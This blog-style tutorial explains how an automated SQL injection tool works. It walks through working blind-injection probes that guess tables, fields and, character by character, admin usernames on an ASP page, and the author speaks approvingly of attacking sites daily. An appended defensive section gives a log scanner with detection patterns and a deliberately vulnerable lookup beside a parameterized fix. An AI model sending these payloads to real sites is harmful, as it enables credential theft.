The odd name in this article's title is new to many readers. Newbies like me knew nothing about it: we only learned that the tool existed, started clicking around, and went off to try to take sites after reading a tutorial without understanding any of it. Today let's analyze how this tool actually works. In fact, it simply automates manual injection.

http://localhost/article.asp?id=124

This is an injection point. First we need it to tell us the table name. How do we submit the guess?

http://localhost/article.asp?id=124 and exists (select count(*) from admin)

Then look at what the page returns. If the page comes back normal, the table exists; otherwise it does not. That is exactly what the Ah D tool does: its built-in dictionary contains many common table names added in advance, and it tries them one by one. As the figure shows, many field names are preset as well, and they are tried the same way.

With the table name, the next step is guessing the fields. The statement is:

http://localhost/article.asp?id=124 and exists (select username from admin)

That is, replace count(*) with a field name and go through the fields in the configuration list one by one; if the page returns normally, the field exists.

With the field known, the next step is guessing its value. Append to the URL:

http://localhost/article.asp?id=124 and (select top 1 len(username) from admin)>0
http://localhost/article.asp?id=124 and (select top 1 len(username) from admin)>5
http://localhost/article.asp?id=124 and (select top 1 len(username) from admin)>6

... until the length is pinned down exactly. The len() function computes the length of the username in the first record, and the comparisons narrow it down until the length is reached. The next step is to determine the value of each character precisely:

and (select top 1 asc(mid(username,1,1)) from admin)>97
and (select top 1 asc(mid(username,1,1)) from admin)>98
and (select top 1 asc(mid(username,1,1)) from admin)>99
and (select top 1 asc(mid(username,1,1)) from admin)=100

Let's parse what this statement means. It uses a few functions: asc() returns the ASCII code of a character, and mid(str, start, len) selects len characters starting at position start of a string. This statement therefore tests the first character of the string. The second character is calculated the same way:

and (select top 1 asc(mid(username,2,1)) from admin)>99

After obtaining the code of each position, converting the codes back to characters gives the user name or password. This is why the tool outputs table names and fields one at a time, and why the detection content on the right is a single character.

Once you understand the principle, can you write an injection tool yourself? I didn't understand any of this before; it's a great feeling to go and hit sites with Ah D every day. Hehe.
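The following is an added example, not part of the original post and not the Ah D tool's own code. It shows the two things a defender takes from the procedure above: how to recognise each probe phase (table, field, length, character) in web-server logs, and why the page is injectable in the first place. The log lines are constructed for this example, and an in-memory SQLite database stands in for the Access database behind article.asp; the table and column names are the ones used in the post, nothing else is assumed about the real site.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# --- 1. Detection: recognise the probe phases from the post in access-log lines ---

# One pattern per phase of the manual procedure. More specific patterns go first,
# because a character probe also contains "and (select".
PROBE_PATTERNS = [
    ("char-probe",   re.compile(r"\basc\s*\(\s*mid\s*\(")),
    ("length-probe", re.compile(r"\band\s*\(\s*select\b.*\blen\s*\(")),
    ("table-probe",  re.compile(r"\band\s+exists\s*\(\s*select\s+count\s*\(\s*\*\s*\)")),
    ("column-probe", re.compile(r"\band\s+exists\s*\(\s*select\s+\w+\s+from\b")),
]

def classify_probe(query_string: str):
    """Return the probe phase a query string matches, or None if it looks benign."""
    # Normalise first: URL-decode, lowercase, collapse whitespace, so that
    # encoding or spacing variations do not hide the pattern.
    text = re.sub(r"\s+", " ", unquote_plus(query_string).lower())
    for phase, pattern in PROBE_PATTERNS:
        if pattern.search(text):
            return phase
    return None

# Minimal "METHOD PATH HTTP/x.y STATUS" line shape, constructed for this example.
LOG_LINE = re.compile(r"^\S+ (?P<path>\S+) HTTP/\d\.\d")

def scan_log(log_text: str):
    """Return (path, phase) for every log line whose query string looks like a probe."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        path = m.group("path")
        query = path.partition("?")[2]
        phase = classify_probe(query)
        if phase:
            hits.append((path, phase))
    return hits

# Constructed sample log: one normal request, then the four probe phases, then
# another normal request. The probes mirror the URLs in the post, URL-encoded.
SAMPLE_LOG = """\
GET /article.asp?id=124 HTTP/1.1 200
GET /article.asp?id=124%20and%20exists%20(select%20count(*)%20from%20admin) HTTP/1.1 200
GET /article.asp?id=124%20and%20exists%20(select%20username%20from%20admin) HTTP/1.1 200
GET /article.asp?id=124%20and%20(select%20top%201%20len(username)%20from%20admin)%3E5 HTTP/1.1 200
GET /article.asp?id=124%20and%20(select%20top%201%20asc(mid(username,1,1))%20from%20admin)%3E97 HTTP/1.1 200
GET /article.asp?id=125 HTTP/1.1 200
"""

# --- 2. Mitigation: the concatenation that makes article.asp injectable, beside the fix ---

def make_demo_db():
    """In-memory stand-in for the site's database (schema constructed for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table article (id integer primary key, title text)")
    conn.execute("create table admin (id integer primary key, username text)")
    conn.execute("insert into article values (124, 'hello')")
    conn.execute("insert into admin values (1, 'admin')")
    return conn

def vulnerable_lookup(conn, raw_id: str):
    """The pattern behind the injection point: the id parameter is pasted into the SQL.
    An 'and exists (...)' suffix becomes part of the WHERE clause, so whether the page
    renders normally leaks whether the subquery is true."""
    sql = "select title from article where id=" + raw_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def safe_lookup(conn, raw_id: str):
    """Hardened version: validate the type, then bind the value as a parameter.
    The suffix can no longer change the query structure; it is just a bad id."""
    try:
        article_id = int(raw_id)
    except ValueError:
        return None
    row = conn.execute("select title from article where id=?", (article_id,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    for path, phase in scan_log(SAMPLE_LOG):
        print(f"{phase:13s} {path}")
    db = make_demo_db()
    probe = "124 and exists (select count(*) from admin)"
    print("vulnerable:", vulnerable_lookup(db, probe))  # the probe is answered
    print("safe:      ", safe_lookup(db, probe))        # the probe is rejected
```

Two design points: the detector normalises the query string before matching, because the probes in the post are sent URL-encoded and spacing is arbitrary; and the hardened lookup combines type validation with a bound parameter, since either alone is weaker (a bound parameter on a text column would still accept the string, and validation without binding invites a second concatenation bug later).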